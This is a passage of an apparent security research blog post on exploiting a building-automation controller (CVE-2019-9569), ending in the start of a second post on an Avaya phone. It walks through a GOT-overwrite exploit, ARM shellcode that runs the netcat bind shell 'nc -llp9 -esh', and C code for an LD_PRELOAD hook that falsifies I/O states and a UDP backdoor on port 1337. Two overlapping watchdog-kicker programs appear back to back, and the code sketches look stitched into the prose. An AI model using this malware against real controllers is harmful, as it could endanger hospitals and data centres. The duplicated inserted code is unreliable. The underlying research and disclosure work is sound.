Using a USB drive to transfer gdbserver onto the device, an initial attempt to debug the running application was made. A few seconds after connecting the debugger to the application, the device initiated a reboot, as shown in Figure 16.

 

Figure 16

An error message gave us a clue as to why the crash occurred, indicating a watchdog timer failure. Watchdog timers are common in critical embedded devices: if the system hangs for a predetermined amount of time, the watchdog takes action to try and correct the problem. In this case, the action chosen by the developers is to reboot the system. Searching the system binaries for this error message revealed the section of code shown in Figure 17. The actual error messages have been redacted at the request of the vendor.

 

Figure 17

The function is decrementing three counters. If any of the counters ever get to zero, then an error is thrown and later the system is rebooted. Examining the code further shows that multiple processes call this function to check the counters very frequently. This means we are not going to be able to dynamically debug the system without figuring out how to disable this software watchdog.

One common approach to this problem is to patch the binaries. It is important when looking at patching a binary to ensure the patch you employ does not introduce any unintended side effects. This generally means you want to make the smallest change possible. In this case, the smallest meaningful change the team came up with was to modify the “subtract by 5” to a “subtract by 0.”  This would not change how the overall program functioned; however, every time the function was called to decrement the counter, the counter would simply never get smaller. The patched code is provided in Figure 18. Notice the IDA decompiler has completely removed the subtraction statement from the code since it is no longer meaningful.

 

Figure 18

With the software watchdog patched, the team attempted to again dynamically debug the application. Initially the test was thought to be successful, since it was possible to connect to gdbserver and start debugging the application. However, after three minutes the system rebooted again. Figure 19 shows the message the team caught on reboot after several repeated experiments with the same results.

 

Figure 19

This indicates that in the boot phase of startup, a hardware watchdog is set to 180 seconds (or three minutes). The system has two watchdog timers, one hardware and one software; we had only disabled one of the timers. The same method of patching the binary which was used to disable the software watchdog timer would not work for the hardware watchdog timer; the application would also need to kick the watchdog to prevent a reboot. Armed with this knowledge, we turned to the Delta binaries on the device for code that could help us “kick” the hardware watchdog. With the debugging symbols left in, it was relatively easy to find a function which was responsible for managing the hardware watchdog.

There are several approaches which could be used to attempt to disable the hardware watchdog. In this scenario, we decided to take advantage of the fact that the code which dealt with the hardware watchdog was in a shared library and exported. This allowed for the creation of a new program using the existing watchdog-kicking code. By creating a second program that will kick the hardware watchdog, we could debug the Delta application without the system resetting.
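A hedged sketch of what such a kicker might look like is below; the library path and export name are placeholders, not the real symbols from the Delta firmware:

#include <dlfcn.h>
#include <unistd.h>

int main() {
    // Load the shared library that exports the hardware watchdog refresh routine.
    void* lib = dlopen("/path/to/delta-watchdog-lib.so", RTLD_NOW);               // placeholder path
    if (!lib) return 1;
    void (*kick)() = reinterpret_cast<void (*)()>(dlsym(lib, "HWWatchdogKick"));   // placeholder symbol
    if (!kick) return 1;
    for (;;) {          // run forever from the init script
        kick();         // refresh the 180-second hardware watchdog
        sleep(60);      // well inside the timeout window
    }
}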

This program was put in the init script of the system, so it would run on boot and continually “kick the dog”, effectively disabling the hardware watchdog. Note: no actual dogs were harmed in the research or creation of this exploit. If anything, they were given extra treats and contributed to the coding of the watchdog patch. Here are some very recent photos of this researcher’s dogs for proof.

 

Figure 20
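As a rough illustration of the watchdog-kicking helper described above, the sketch below loads the shared library and calls the exported kick routine in a loop. The library path and the symbol name (wd_kick) are assumptions for illustration, not the actual Delta names.

/*
 * Sketch of a stand-alone "watchdog kicker". The shared-library path and
 * the exported function name (wd_kick) are hypothetical stand-ins for the
 * actual Delta symbols.
 */
#include <dlfcn.h>
#include <stdio.h>
#include <unistd.h>

typedef int (*wd_kick_fn)(void);

int main(void)
{
    void *lib = dlopen("/usr/lib/libhwwd.so", RTLD_NOW);        /* hypothetical library name */
    if (!lib) { fprintf(stderr, "dlopen: %s\n", dlerror()); return 1; }

    wd_kick_fn wd_kick = (wd_kick_fn)dlsym(lib, "wd_kick");     /* hypothetical exported symbol */
    if (!wd_kick) { fprintf(stderr, "dlsym: %s\n", dlerror()); return 1; }

    /* Kick the hardware watchdog well inside its 180-second window. */
    for (;;) {
        wd_kick();
        sleep(60);
    }
}

Launched from the init script, a loop like this keeps the hardware watchdog satisfied for as long as the device is up.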

With both the hardware and software watchdog timers pacified, we could continue to determine if our previously discovered vulnerability was exploitable.

Writing the Exploit

Before attempting exploitation, we wanted to first investigate if the system had any exploit mitigations or limitations we needed to be aware of. We began by running an open source script called “checksec.sh”. This script, when run on a binary, will report if any of the common exploit mitigations are in place. Figure 21 shows the script’s output when run on the primary Delta binary, named “dactetra”.

Figure 21

The check came back with only NX enabled. This also held true for each of the shared libraries where the vulnerable code is located.

As discussed above, the vulnerability allows for a write-what-where condition, which leads us to the most important question: what do we want to write where? Ultimately, we want to write shellcode somewhere in memory and then jump to that shellcode. Since the attacker controls the last packet sent, it is plausible that the attacker could have their shellcode on the stack. If we put shellcode on the stack, we would then have to bypass the No eXecute (NX) protection discovered using the checksec tool. Although this is possible, we wondered if there was a simpler method.

Reexamining the crash dump at the memory location which has been overwritten by the large malformed packet, we found a small contiguous section of heap memory, totaling 32 bytes, which the attacker could control. We came to this conclusion because of the presence of 0x22 bytes – the contents of the malformed packet’s payload. At the time the overflow occurs, more of this region is filled with 0x22’s, but by the time our write-what-where condition is triggered, many of these bytes get clobbered, leaving us with the 32-byte section shown in Figure 22.

Figure 22

Being heap memory, this region was also executable, a detail that will become important shortly. Replacing the 0x22’s in the malformed packet with a non-repeating pattern both revealed where in the payload to place our shell code and confirmed that the bytes in this region were all unique.

With a potential place to put our shellcode, the next major component to address was controlling execution. The write-what-where condition allowed us to write anywhere in memory; however, it did not give us control of execution. One technique to tackle this problem is to leverage the Global Offset Table (GOT). In Linux, the GOT redirects a function pointer to an absolute location and is located in the .got section of an ELF executable or shared object. Since the .got section is written to at execution time, it is generally still writable later during execution. Relocation Read Only (RELRO) is an exploit mitigation which marks the loaded .got section read-only once it is mapped; however, as seen above, this protection was conveniently not enabled. This meant it was possible to use the write-what-where condition to write the address of our shellcode in memory to the GOT, replacing a function pointer of a future function call. Once the replaced function pointer is called, our shellcode would be executed.
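To make the idea concrete, here is a self-contained toy example (not the Delta code) showing why overwriting a writable function pointer, which is effectively what a non-RELRO GOT entry is, hands control of execution to the attacker:

/*
 * Toy illustration of why an attacker-controlled write into a writable
 * function-pointer table (such as a non-RELRO GOT) yields control of
 * execution. This is a self-contained demo, not the Delta binary.
 */
#include <stdio.h>

static void decode_packet(void)  { puts("decoding packet"); }
static void shellcode_stub(void) { puts("attacker code runs instead"); }

/* Stand-in for a GOT slot: a writable pointer that a later call goes through. */
static void (*got_slot)(void) = decode_packet;

int main(void)
{
    got_slot();                 /* normal path: the real function is called   */
    got_slot = shellcode_stub;  /* the "write-what-where": overwrite the slot */
    got_slot();                 /* next call through the slot is hijacked     */
    return 0;
}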

But which function pointer should we replace? To ensure the highest probability of success, we decided it would be best to replace the pointer to a function that is called as close to the overwrite as possible. This is because we wanted to minimize changes to the memory layout during program execution. Examining the code again from the return of the “scNetMove” function, we see within just a few instructions “scDecodeBACnetUDP” is called. This therefore becomes the ideal choice of pointer to overwrite in the GOT.

Figure 23

Knowing what to write where, we next considered any conditions which needed to be met for the correct code path to be taken to trigger the vulnerability. Taking another look at the code in memcpy that allows the buffer overflow to occur, we noticed that the overwrite does indeed have a condition, as shown in Figure 24.

Figure 24

The code producing the overwrite in memory is only taken if the value in R0, when bitwise ANDed with the immediate value 3, is not equal to 0. From our crash dump, we knew that the value in R0 is the address of the destination we want to copy to. This potentially posed a problem. If the address we wanted to write to was 4-byte aligned, which was highly likely, the code path for our vulnerability would not be taken. We could ensure that our code path was taken by subtracting one from the address we wish to write to in the GOT and then repairing the last byte of the previous entry. This ensures that the correct code path is taken and that we do not unintentionally damage a second function pointer.

Shellcode

While we discovered a place to put our shellcode, it offers only a very small amount of space, specifically 32 bytes, in which to write the payload (shown in Figure 22). What can we accomplish in such a small amount of space? One method that does not require extensive shellcode is to use a “return to libc” attack to execute the system command. For our exploit to work out of the box, whatever command or program we run with system must be present on the device by default. Additionally, the command string itself needs to be quite short to accommodate the limited number of bytes we have to work with.

An ideal scenario would be executing code that would allow remote shell access to the device. Fortunately, Netcat is present on the device and this version of Netcat supports both the “-ll” flag, for persistent listening on a port for a connection, and the “-e” flag, for executing a command on connection. Thus, we could use system to execute Netcat to listen on some port and execute a shell when a connection is made. Before writing shell code to execute system with this command, we first tested various Netcat commands on the device directly to determine the shortest Netcat command that would still give us a shell. After a few iterations, we were able to shorten the Netcat command to 13 bytes:

nc -llp9 -esh

Since the instructions must be 4-byte-aligned and we have 32 bytes to work with, we are only concerned with the length of the string rounded up to the nearest multiple of 4, so in this case 16 bytes. Subtracting this from our total 32 bytes, we have 16 bytes left, or 4 instructions total, to set up the argument for system and jump to it. A common method to fit more instructions into a small space in memory on ARM is to switch to Thumb mode. This is because ARM’s Thumb mode utilizes 16-bit (2-byte) instructions, instead of the regular 32-bit (4-byte) ARM instructions. Unfortunately, the processor on this device did not support Thumb mode and therefore this was not an option.

The challenge to accomplishing our task in only 4 ARM instructions is the limit ARM places on immediate values. To jump to system, we needed to use an immediate value as the address to jump to, but memory addresses are not generally small values. Immediate values in ARM are limited to 12 bits; eight of these bits are for the value itself and the other 4 are used for bit shifting. This means that an immediate value can only be one byte long (two hex digits), but that byte can be zero padded in any fashion you like. Therefore, loading a full 4-byte memory address using immediate values would take all 4 instructions, whether using MOV or ADD. While we do have 4 instructions to play with, we also need at least one instruction to load the address of our command string into R0, the register used as the first parameter for system, and at least one instruction to branch to the address, requiring a total of 6 instructions.
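To illustrate the constraint, the small helper below (a sketch, independent of the Delta exploit) tests whether a 32-bit constant can be encoded as a classic ARM data-processing immediate, i.e. an 8-bit value rotated right by an even amount:

/*
 * Check whether a 32-bit constant can be encoded as a classic ARM
 * data-processing immediate: an 8-bit value rotated right by an even
 * amount (0, 2, ..., 30).
 */
#include <stdint.h>
#include <stdio.h>

static int is_arm_immediate(uint32_t v)
{
    for (unsigned rot = 0; rot < 32; rot += 2) {
        /* rotating left by rot undoes a rotate-right-by-rot encoding */
        uint32_t candidate = rot ? ((v << rot) | (v >> (32 - rot))) : v;
        if (candidate <= 0xFFu)
            return 1;
    }
    return 0;
}

int main(void)
{
    printf("0x51000: %d\n", is_arm_immediate(0x51000)); /* 0x51 rotated -> encodable          */
    printf("0x7F0:   %d\n", is_arm_immediate(0x7F0));   /* 0x7F rotated -> encodable          */
    printf("0x517F0: %d\n", is_arm_immediate(0x517F0)); /* too wide -> needs two instructions */
    return 0;
}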

One way to reduce the number of instructions needed is to start by copying a register already containing a value close to the address we want at the time the shellcode executes. Whether this is feasible depends on the value of the address we want to jump to compared to the addresses we have available in the registers right before our shell code is executed.

Starting with the address we need to call, we discovered three addresses we could jump to that would call system.

  1. 0x4006425C – the address of a BL system (branch to system) instruction in boot.so.
  2. 0x40054510 – the address of the system entry in “boot.so”’s GOT.
  3. 0x402874A4 – the direct address of system in libuClibc-0.9.30.so.

Next, we compared these options to the values in the registers at the time the shellcode is about to execute using GDB, shown in Figure 25.

Figure 25

Of the registers we have access to at the time our shell code executes, the one that gives us the smallest delta between its contents and one of these three addresses we can use to call system is R4. R4 contains 0x40235CB4, giving a delta of 0x517F0 when compared to the address for a direct call to system. The last nibble being 0 is ideal since that means we don’t have to account for the last bit, thanks to the rotation mechanism inherent to ARM immediate values. This means that we only need two immediate values to convert the contents of R4 into our desired address: one for 0x51000, the other for 0x7F0. Since we can apply an immediate offset when MOV’ing one register into another, we should be able to load a register with the address of system in only two instructions. With one instruction for performing the branch and 16 bytes for the command string, this means we can get all our shell code in 32 bytes, assuming we can load R0 with the address of our string in one instruction.

By starting our ASCII string for the command directly after the fourth and last instruction, we can copy PC into R0 with the appropriate offset to make it point to the string. An added benefit of this approach is that it makes the string’s address independent of where the shell code is placed into memory, since it’s relative to PC. Figure 26 shows what the shellcode looks like with consideration for all restrictions.

Figure 26

It is important to note that the “.asciz” assembler directive is used to place a null-terminated ASCII string literal into memory. R12 was chosen as the register to hold the branch target, since R12 is the intra-procedure-call (IP) scratch register on the ARM architecture. This means R12 is often used as general-purpose scratch space within subroutines, indicating it is almost certainly safe to clobber for our purposes without unexpected adverse effects.

Piecing Everything Together

With a firm understanding of the vulnerability, the exploit, and the shellcode needed, we could now attempt exploitation. Looking at the sequence of packets used in this attack, it is not a single-packet attack but a multi-packet attack. The initial buffer overflow is contained in the large malformed packet, so what data do we build into it? This packet overwrites memory but does not provide control over execution; therefore, it can be considered the “setup” or “staging” packet. This is where memcpy will look for the address of the destination buffer for our last packet. The address we want to overwrite goes in this packet, followed by our shellcode. As explained above, the address we are looking to overwrite is the address of the scDecodeBACnetUDP function pointer in the GOT minus one, to ensure the address isn’t 4-byte aligned. By repairing the last byte of the previous function pointer and overwriting this address, we can gain execution control.

The large malformed packet contains “where” we want to “write” to and puts our shellcode into memory yet does not contain “what” we want to write. The “what”, in this case, is the address of our shellcode, so our last packet needs to contain this address. The final challenge is deciding where in the last packet the address belongs.

Recall from the core dump shown previously that the crash happens on memcpy attempting to write the value 0x81 to the bad address. 0x81 is the first byte of the BVLC layer, indicating this is where our address needs to go within the last packet to ensure that only the address we want is overwritten. We also need to ensure there are not any bytes after our address; otherwise we will continue to overwrite the GOT past our target address. Since this is a multi-threaded application, that could cause it to crash before our shellcode has a chance to execute. Since the BVLC layer is typically how a packet is identified as a BACnet packet, a potential problem with altering this layer is that the last packet will no longer look like a BACnet packet. If this is the case, will the application still ingest the packet? The team tested this and discovered that the application will ingest any broadcast packet regardless of type, since the vulnerable code is executed before the code that validates the packet type.

Taking everything into account and sending the series of 97 packets, we were able to successfully exploit the building manager by creating a bind shell. Below is a video demonstrating this attack:

A Real-world Scenario

Although providing a root shell to an attacker proves the vulnerability is exploitable, what can an attacker do with it? A shell by itself does not prove useful unless an attacker can control the normal operation of the system or steal valuable data. In this case, there is not a lot of useful data stored on the device. Someone could download information about how the system is configured or what it is controlling, which may have some value, but this will not hold significant impact on its own. An attacker could also delete essential system files as a denial-of-service attack, easily putting the target in an unusable state, but pure destruction is of low value for various reasons. First, as mentioned previously, the device has a backup image that it will fall back to if a failure occurs during the boot process. Without physical access to the device, an attacker wouldn’t have a clear idea of how the backup image differs from the original or even if it is exploitable. If the backup image uses a different version of the firmware, the exploit may no longer work. Perhaps more importantly, a denial-of-service attack suffers from its inherent lack of subtlety. If the attack immediately causes alarms to go off when executed, the attacker can expect that their persistence in the system will be short-lived.

What if the system could be controlled by an attacker while being undetected?  This scenario becomes more concerning considering the type of environments controlled by this device.

Normal Programming

Controlling the standard functions of the device from just a root shell requires a much deeper understanding of how the device works in a normal setting. Typically, the Delta eBMGR is programmed by an installer to perform a specific set of tasks. These tasks can range from managing access control, to building lighting, to HVAC, and more. Once programmed, the controller is connected to several external input/output (I/O) modules. These modules are utilized for both controlling the state of an attached device and relaying information back to the manager. To replicate these “normal conditions”, we had a professional installer program our device with a sample program and attach the appropriate modules.

Figure 27 shows how each component is connected in our sample programming.  For our initial testing, we did not actually have the large items such as the pump, boiler and heating valve. The state of these items can be tracked through either LEDs on the modules or the touchscreen interface, hence it was unnecessary for us to acquire them for testing purposes. Despite this, it is still important to note which type of input or output each “device”, virtual or otherwise, is connected to on the modules.

Figure 27

The programming to control these devices is surprisingly simple. Essentially, based on the inputs, an output is rendered. Figure 28 shows the programming logic present on the device during our testing.

Figure 28

There are three user-defined software variables: “Heating System”, “Room Temp Spt”, and “Heating System Enable Spt”.  Here, “spt” indicates a set point. These can be defined by an operator at run time and help determine when an output should be turned on or off. The “Heating System” binary variable simply controls the on/off state of the system.

Controlling the Device

Like when we first started looking for vulnerabilities, we want to ensure our method of controlling the device is not dependent on code which could vary from controller to controller. Therefore, we want to find a method that allows us to control all the I/O devices attached to a Delta eBMGR, ensuring we are not dependent on this device’s specific programming.

As on any Linux-based system, the installer-defined programming at its lowest level utilizes system calls, or functions, to control the attached hardware. By finding a way to manipulate these functions, we would therefore have a universal method of controlling the modules regardless of the installer programming.  A very common way of gaining this type of control when you have root access to a system is through the use of function hooking. The first challenge for this approach is simply determining which function to hook. In our case, this required an extensive amount of reverse engineering and debugging of the system while it was running normally. To help reduce the scope of functions we needed to investigate, we began by focusing our attention on controlling binary output (BO). Our first challenge was how to find the code that handles changing the state of a binary output.

A couple of key factors helped point us in the right direction. First, the documentation for the controller indicates the devices talk to the I/O modules over a Controller Area Network Bus (CAN bus), which is common for PLC devices.  As previously seen, the Delta binaries all have symbols included.  Thus, we can use the function names provided in the binaries to help reduce the code surface we need to look at – IDA tells us there are only 28 functions with “canio” as the first part of their name. Second, we can assume that since changing the state of a BO requires a call to physical hardware, a Linux system call is needed to make that change. Since the device is making a change to an IO device, it is highly likely that the Linux system call used is “ioctl”. When cross-referencing the functions that start with “canio” and that call “ioctl”, our prior search space of 28 drops to 14. One function name stood out above the rest: “canioWriteOutput”. The decompiled version of the function has been reproduced in Figure 29.

Figure 29

To test this hypothesis, we set a breakpoint on the call to “ioctl” inside canioWriteOutput and used the touchscreen to change the state of one of the binary outputs from “off” to “on”. Our breakpoint was hit! Single stepping over the breakpoint, we were able to see the correct LED light up, indicating the output was now on.

Now knowing the function we needed to hook, the question quickly became: How do we hook it? There are several methods to accomplish this task, but one of the simplest and most stable is to write a library that the main binary will load into memory during its startup process, using an environment variable called LD_PRELOAD. If a path or multiple paths to shared objects or libraries are set in LD_PRELOAD before executing a program, that program will load those libraries into its memory space before any other shared libraries. This is significant, because when Linux resolves a function call, it looks for function names in the order in which the libraries are loaded into memory. Therefore, if a function in the main Delta binary shares a name and signature with one defined in an attacker-generated library that is loaded first, the attacker-defined function will be executed in its place. As the attacker has a root shell on the device, it is possible for them to modify the init scripts to populate the LD_PRELOAD variable with a path to an attacker-generated library before starting the Delta software upon boot, essentially installing malware that executes upon reboot.

Using the cross-compile toolchain created in the early stages of the project, it was simple to test this theory with the “library” shown in Figure 30.

Figure 30

The code above doesn’t do anything meaningful, but it confirms that hooking this function works as expected. We first defined a function pointer using the same function prototype we saw in IDA for canioWriteOutput. When canioWriteOutput is called, our function is called first, creating an output file in the “opt” directory and giving us a place to write text, proving that our hook is working. Then, we look up the original canioWriteOutput in the symbol table and call it with the same parameters passed into our hook, essentially creating a passthrough function. The success of this test confirmed this method would work.
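A minimal approximation of such a pass-through hook is sketched below; the three-integer prototype used for canioWriteOutput is an assumption for illustration, as the real prototype comes from the symbols in the Delta binary.

/*
 * Approximation of an LD_PRELOAD pass-through hook for canioWriteOutput.
 * The prototype used here (three integer arguments) is an assumption for
 * illustration; the real prototype comes from the Delta binary's symbols.
 */
#define _GNU_SOURCE
#include <dlfcn.h>
#include <stdio.h>

typedef int (*canio_write_output_fn)(int module, int channel, int state);

int canioWriteOutput(int module, int channel, int state)
{
    static canio_write_output_fn real = NULL;
    if (!real)
        real = (canio_write_output_fn)dlsym(RTLD_NEXT, "canioWriteOutput");

    /* Prove the hook is running by logging every call. */
    FILE *log = fopen("/opt/hook.log", "a");
    if (log) {
        fprintf(log, "canioWriteOutput(%d, %d, %d)\n", module, channel, state);
        fclose(log);
    }

    /* Pass-through: call the original function with unmodified arguments. */
    return real(module, channel, state);
}

Built with something like gcc -shared -fPIC hook.c -o hook.so -ldl and referenced from LD_PRELOAD, a library of this shape is resolved before the Delta binaries resolve their own symbols.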

For our function hook to do more than just act as a passthrough, we needed to understand what parameters were being passed to the function and how they affect execution. By using GDB, we could examine the data passed in during both the “on” and “off” states. For canioWriteOutput, we discovered that the state of the binary output was encoded into the second parameter passed to the function. From there, we could theoretically control the state of the binary output by simply passing the desired state as the second parameter to the real function, leaving the other parameters as-is. In practice, however, the state change produced using this method persisted only for a split second before the device reset the output back to its proper state.

Why was the device returning the output to the correct state? Is there some type of protection in place? Investigating strings in the main Delta binary and the filesystem on the device led us to discover that the device software maintains databases on the filesystem, likely to preserve device and state information across reboots. At least one of these databases is used to store the state of binary outputs along with, presumably, other kinds of I/O devices. With further investigation using GDB, we discovered that the device is continuously polling this database for the state of any binary outputs and then calling canioWriteOutput to publish the state obtained from the database, clobbering whatever state was there before. Similarly, changes to this state made by a user via the touchscreen are stored in this same database. At first, it may appear that the simplest solution would be to change the database value since we have root access to the device. However, the database is not in a known standard format, meaning we would need to take the time to reverse this format and understand how the data is stored. As we already have a way to hook the functions, controlling the outputs at the time canioWriteOutput is called is simpler.

To accomplish this, we updated our malware to keep track of whether the attacker has made a modification to the output or not. If they have, the hook function replaces the correct state, stored in canioWriteOutput’s second parameter, with the state asserted by the attacker before calling the real canioWriteOutput function. Otherwise, the hook function acts as a simple passthrough for the real deal. A positive side effect of this, from the attacker’s perspective, is the touchscreen will show the output as the state the user last requested even after the malware has modified it. Implementing this simple state-tracking resolved our prior issue of the attacker-asserted state not persisting.

With control of the binary output, we moved on to looking at each of the other types of inputs and outputs that can be connected to the modules. We used a similar approach in identifying the methods used to read or write data from the modules and then hooking them. Unfortunately, not every function was as simple as canioWriteOutput. For example, when reversing the functions used to control analog outputs, we noticed that they utilized custom data structures to hold various information about the analog device, including its state. As a result, we had to first reverse the layout of these data structures to understand how the analog information was being sent to the outputs before we could modify their state. By using a combination of static and dynamic analysis, we were able to create a comprehensive malicious library to control the state of any device connected to the manager.

Taking our Malware to the Next Level

Although making changes from a root shell certainly proves that an attacker can control the device once it has been exploited, it is more practical and realistic for the attacker to have complete remote control not contingent on an active shell. Since we were already loading a library on startup to manipulate the I/O modules, we decided it would also be feasible to use that same library to create a command-and-control type infrastructure. This would allow an attacker to just send commands remotely to the “malware” without having to maintain a constant connection or shell access.

To bring this concept to life, we needed to create a backdoor, and an initialization function was the natural place to start it from. After some digging, we found “canioInit”, a function responsible for initializing the CAN bus. Since the CAN bus is required to make any modifications to the operation of the device, it made sense to wait for this function to be called before starting our backdoor. Unlike some of the previous hooks mentioned, we don’t make any changes to this call or its return data; we only use it as a method to ensure our backdoor is started at the proper time.

Figure 31

When canioInit is called, we first spawn a new thread and then execute the real canioInit function. Our new thread opens a socket on UDP port 1337 and listens for very specific commands, such as “bo0 on” to turn on binary output 0, or “reset” to put the device back under the user’s control. Based on the commands provided, the “set_io_state” method called by this thread activates the necessary hooking methods to control the I/O as described in the previous section.

Figure 32
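The sketch below approximates this arrangement: a hooked canioInit spawns a listener thread on UDP port 1337 and forwards each received command string to the I/O-hooking logic. The canioInit prototype and the set_io_state helper are hypothetical stand-ins; only the port and the command strings come from the description above.

/*
 * Sketch of hooking canioInit to start a simple UDP "command" thread.
 * canioInit's prototype and the set_io_state() helper are hypothetical;
 * only the port (1337) and command strings come from the write-up.
 */
#define _GNU_SOURCE
#include <arpa/inet.h>
#include <dlfcn.h>
#include <pthread.h>
#include <sys/socket.h>

static void set_io_state(const char *cmd) { (void)cmd; /* hypothetical: route cmd to the I/O hooks */ }

static void *command_thread(void *arg)
{
    (void)arg;
    int sock = socket(AF_INET, SOCK_DGRAM, 0);
    struct sockaddr_in addr = {0};
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = INADDR_ANY;
    addr.sin_port = htons(1337);
    bind(sock, (struct sockaddr *)&addr, sizeof(addr));

    char buf[64];
    for (;;) {
        ssize_t n = recv(sock, buf, sizeof(buf) - 1, 0);
        if (n <= 0)
            continue;
        buf[n] = '\0';
        set_io_state(buf);      /* e.g. "bo0 on" or "reset" */
    }
    return NULL;
}

typedef int (*canio_init_fn)(void);

int canioInit(void)
{
    static canio_init_fn real = NULL;
    if (!real)
        real = (canio_init_fn)dlsym(RTLD_NEXT, "canioInit");

    /* Start the backdoor thread, then let the real initialization proceed. */
    pthread_t t;
    pthread_create(&t, NULL, command_thread, NULL);
    return real();
}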

With a fully functioning backdoor in the memory space of the Delta software, we had full control of the device with a realistic attack chain. Figure 33 outlines the entire attack.

Figure 33

The entire process above, from sending out the malicious packets to gaining remote control, takes under three minutes, with the longest task being the reboot. Once the attacker has established control, they can operate the device without impacting what information the user is provided, allowing the attacker to stay undetected and granting them ample opportunity to cause serious damage, depending on what kind of hardware the Delta controller manages.

Real World Impact

What is the impact of an attack like this? These controllers are installed in multiple industries around the world. Via Shodan, we have observed nearly 600 internet-accessible controllers running vulnerable versions of the firmware.  We tracked eBMGR devices from February 2019 to April 2019 and found that there were a significant number of new devices available with public IP addresses.

As of early April 2019, 492 eBMGR devices remained reachable via internet-wide scans using Shodan. Of those found, a portion are almost certainly honeypots based on user-applied tags found in the Shodan data, leaving 404 potentially vulnerable victims. If we include other Delta Controls devices using the same firmware and assume a high likelihood they are vulnerable to the same exploit, the total number of potential targets balloons to over 1600. We tracked 119 new internet-connected eBMGR devices since February 2019; however, these were outpaced by the 216 devices that have subsequently gone offline. We believe this decline is a combination of ICS system administrators following the standard practice of taking these devices off the Internet, coupled with a strategy by the vendor (Delta Controls) of proactively reaching out to customers to reduce the internet-connected footprint of the vulnerable devices. Most controllers appear to be in North America, with the US accounting for 53% of online devices and Canada accounting for 35%. It is worth noting that in some cases the IP address, and hence the geographic location of the device from Shodan, traces back to an ISP (Internet Service Provider), which could result in skewed findings for locations.

Some industries seem more at risk than others given the accessibility of devices. We were only able to map a small portion of these devices to specific industries, but the top three categories we found were Education, Telecommunications, and Real Estate. Education included everything from elementary schools to universities. In academic settings, the devices were sometimes deployed district-wide, in numerous facilities across multiple campuses. One example is a public-school system in Canada where each school building in the district had an accessible device. The telecommunications category consisted entirely of ISPs and/or phone companies; many of these could simply be due to the ISP being listed as the service provider. The real estate category generally included office and apartment buildings. From available metadata in the search results, we also managed to find instances of education, healthcare, government, food, hospitality, real estate, child care and financial institutions using the vulnerable product.

With a bit more digging, we were easily able to find other targets through publicly available information. While it is not common practice to post sensitive documents online, we found many documents available that indicate these devices are used as part of a company’s building automation plans. This was particularly true for government buildings, where solicitations for proposals are issued to build the required infrastructure. All in all, we collected around 20 documents that include detailed proposals, requirements, pricing, engineering diagrams, and other information useful for reconnaissance. One particular government building had a 48-page manual that included internal network settings of the devices, control diagrams, and even device locations.

Redacted network diagram found on the Internet specifying ICS buildout

What does it matter if an attacker can turn on and off someone’s AC or heat?  Consider some of the industries we found that could be impacted. Industries such as hospitals, government, and telecommunication may have severe consequences when these systems malfunction. For example, the eBMGR is used to maintain positive/negative pressure rooms in medical facilities or hospitals, where the slightest change in pressurization could have a life-threatening impact due to the spread of airborne diseases.  Suppose instead a datacenter was targeted. Datacenters need to be kept at a cool temperature to ensure they do not overheat. If an attacker were to gain access to the vulnerable controller and use it to raise heat to critical levels and disable alarms, the result could be physical damage to the server hardware en masse, as well as downtime costs, not to mention potential permanent loss of critical data.  According to the Ponemon Institute (https://www.ponemon.org/library/2016-cost-of-data-center-outages), the average cost of a datacenter outage was as high as $740,357 in 2016 and climbing. Microsoft was a prime example of this; in 2018, the company suffered a massive datacenter outage (https://devblogs.microsoft.com/devopsservice/?p=17485) due to a cooling failure, which impacted services for around 22 hours.

To show the impact beyond LED lights flashing, McAfee’s ATR contracted a local Delta installer to build a small datacenter simulation with a working Delta system. This includes both heating and cooling elements to show the impact of an attack in a true HVAC system. In this demonstration we show both normal functionality of the target system, as well as the full attack chain, end-to-end, by raising the temperature to dangerous levels, disabling critical alarms and even faking the controller into thinking it is operating normally. The video below shows how this simple unpatched vulnerability could have devastating impact on real systems.

We also leverage this demo system, now located in our Hillsboro research lab, to highlight how an effective patch, in this case provided by Delta Controls, is used to immediately mitigate the vulnerability, which is ultimately our end goal of this research project.

Conclusion

Discoveries such as CVE-2019-9569 underline the importance of secure coding practices on all devices. ICS devices such as this Delta building manager control critical systems which have the potential to cause harm to businesses and people if not properly secured.

There are some best practices and recommendations related to the security of products falling into nonstandard environments such as industrial controls. Based on the nature of the devices, they may not have the same visibility and process control as standard infrastructure such as web servers, endpoints and networking equipment. As a result, industrial control hardware like the eBMGR PLC may be overlooked from various angles including network or Internet exposure, vulnerability assessment and patch management, asset inventory, and even access controls or configuration reviews. For example, a principle of least privilege policy may be appropriate, and a network isolation or protected network segment may help provide boundaries of access to adversaries. An awareness of security research and an appropriate patching strategy can minimize exposure time for known vulnerabilities. We recommend a thorough review and validation of each of these important security tenants to bring these critical assets under the same scrutiny as other infrastructure.

One goal of the McAfee Advanced Threat Research team is to identify and illuminate a broad spectrum of threats in today’s complex and constantly evolving landscape. As per McAfee’s vulnerability public disclosure policy, McAfee’s ATR informed and worked directly with the Delta Controls team.  This partnership resulted in the vendor releasing a firmware update which effectively mitigates the vulnerability detailed in this blog, ultimately providing Delta Controls’ consumers with a way to protect themselves from this attack. We strongly recommend any businesses using the vulnerable firmware version (571848 or prior) update as soon as possible in line with your patch policy and testing strategy. Of special importance are those systems which are Internet-facing. McAfee customers are protected via the following signature, released on August 6th: McAfee Network Security Platform 0x45d43f00 BACNET: Delta enteliBUS Manager (eBMGR) Remote Code Execution Vulnerability.

We’d like to take a minute to recognize the outstanding efforts from the Delta Controls team, which should serve as a poster-child for vendor/researcher relationships and the ability to navigate the unique challenges of responsible disclosure.  We are thrilled to be collaborating with Delta, who have embraced the power of security research and public disclosure for both their products as well as the common good of the industry. Please refer to the following statement from Delta Controls which provides insight into the collaboration with McAfee and the power of responsible disclosure.

The post HVACking: Understanding the Delta Between Security and Reality appeared first on McAfee Blogs.

Avaya Deskphone: Decade-Old Vulnerability Found in Phone’s Firmware

Avaya is the second largest VOIP solution provider (source) with an install base covering 90% of the Fortune 100 companies (source), with products targeting a wide spectrum of customers, from small business and midmarket, to large corporations. As part of the ongoing McAfee Advanced Threat Research effort into researching critical vulnerabilities in widely deployed software and hardware, we decided to have a look at the Avaya 9600 series IP Deskphone. We were able to find the presence of a Remote Code Execution (RCE) vulnerability in a piece of open source software that Avaya likely copied and modified 10 years ago, and then failed to apply subsequent security patches to. The bug affecting the open source software was reported in 2009, yet its presence in the phone’s firmware remained unnoticed until now. Only the H.323 software stack is affected (as opposed to the SIP stack that can also be used with these phones), and the Avaya Security Advisory (ASA) can be found here ASA-2019-128.

